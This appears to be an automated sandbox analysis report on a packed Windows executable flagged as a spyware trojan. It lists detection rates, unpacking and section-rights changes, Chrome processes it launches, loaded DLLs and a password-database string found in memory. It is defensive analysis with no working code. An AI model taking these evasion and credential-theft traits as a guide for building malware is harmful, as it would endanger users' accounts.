Source: TTsfmr1RWm.exe, 00000000.00000003.2552058257.0000000005F9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513642095.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2525470094.0000000005F99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2516413831.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2516911801.0000000006079000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2548606886.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2523879084.00000000060C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2510726381.0000000006032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2514968198.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2516293607.000000000606A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2515217618.0000000006057000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513261405.0000000006053000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2530324808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2529887376.00000000060E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512343316.0000000006031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2510527222.0000000005BFA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2531191121.00000000060F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512925321.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2530857492.000000000622B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2517035477.0000000005FA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2527176330.0000000005F99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2527450489.00000000060CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2515817895.000000000606A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2514231165.0000000005F98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2522800356.00000000060C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2514463236.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513967622.0000000006048000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2525075899.00000000061EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2516785361.0000000005FA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513046800.000000000604D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512229365.0000000005F98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512461743.00000000060D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2524829666.00000000060BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2516174534.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2520510709.000000000609D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2518252613.000000000608E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2520846442.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2520092575.0000000005FA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2531026684.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512579037.0000000005F9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513472740.000000000604F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2507946737.0000000005E28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2522158481.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2507946737.0000000005D96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519963088.00000000060B3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2548537464.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2520228605.00000000060B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2521213336.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519827847.0000000005FA5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2523035720.0000000005F96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2514818378.0000000006114000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2526697798.0000000005F96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519199860.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe

Source: TTsfmr1RWm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: TTsfmr1RWm.exe

Static PE information: Section: ZLIB complexity 0.9996234170751634

Source: TTsfmr1RWm.exe

Binary or memory string: .vbp_

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/64@9/5

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Code function: 0_2_00962070 CoCreateInstance,

0_2_00962070

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TTsfmr1RWm.exe, 00000000.00000003.2295522238.0000000005B27000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2320571922.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2296020237.0000000005B09000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TTsfmr1RWm.exe	Virustotal: Detection: 52%
Source: TTsfmr1RWm.exe	ReversingLabs: Detection: 55%

Source: TTsfmr1RWm.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

File read: C:\Users\user\Desktop\TTsfmr1RWm.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TTsfmr1RWm.exe "C:\Users\user\Desktop\TTsfmr1RWm.exe"
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2052,i,2643484454984421268,17398489647533980506,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1932,i,6243426754934364140,9618148067064436805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2052,i,2643484454984421268,17398489647533980506,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1932,i,6243426754934364140,9618148067064436805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Section loaded: wkscli.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: TTsfmr1RWm.exe

Static file information: File size 2955776 > 1048576

Source: TTsfmr1RWm.exe

Static PE information: Raw size of ncozhsgk is bigger than: 0x100000 < 0x2a7e00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Unpacked PE file: 0.2.TTsfmr1RWm.exe.930000.0.unpack :EW;.rsrc :W;.idata :W;ncozhsgk:EW;opgfpctb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;ncozhsgk:EW;opgfpctb:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: TTsfmr1RWm.exe

Static PE information: real checksum: 0x2dc2af should be: 0x2d1e7b

Source: TTsfmr1RWm.exe	Static PE information: section name:
Source: TTsfmr1RWm.exe	Static PE information: section name: .rsrc
Source: TTsfmr1RWm.exe	Static PE information: section name: .idata
Source: TTsfmr1RWm.exe	Static PE information: section name: ncozhsgk
Source: TTsfmr1RWm.exe	Static PE information: section name: opgfpctb
Source: TTsfmr1RWm.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01334361 push ecx; iretd	0_3_01334362
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_013343C2 push 29FFC700h; ret	0_3_013343C7
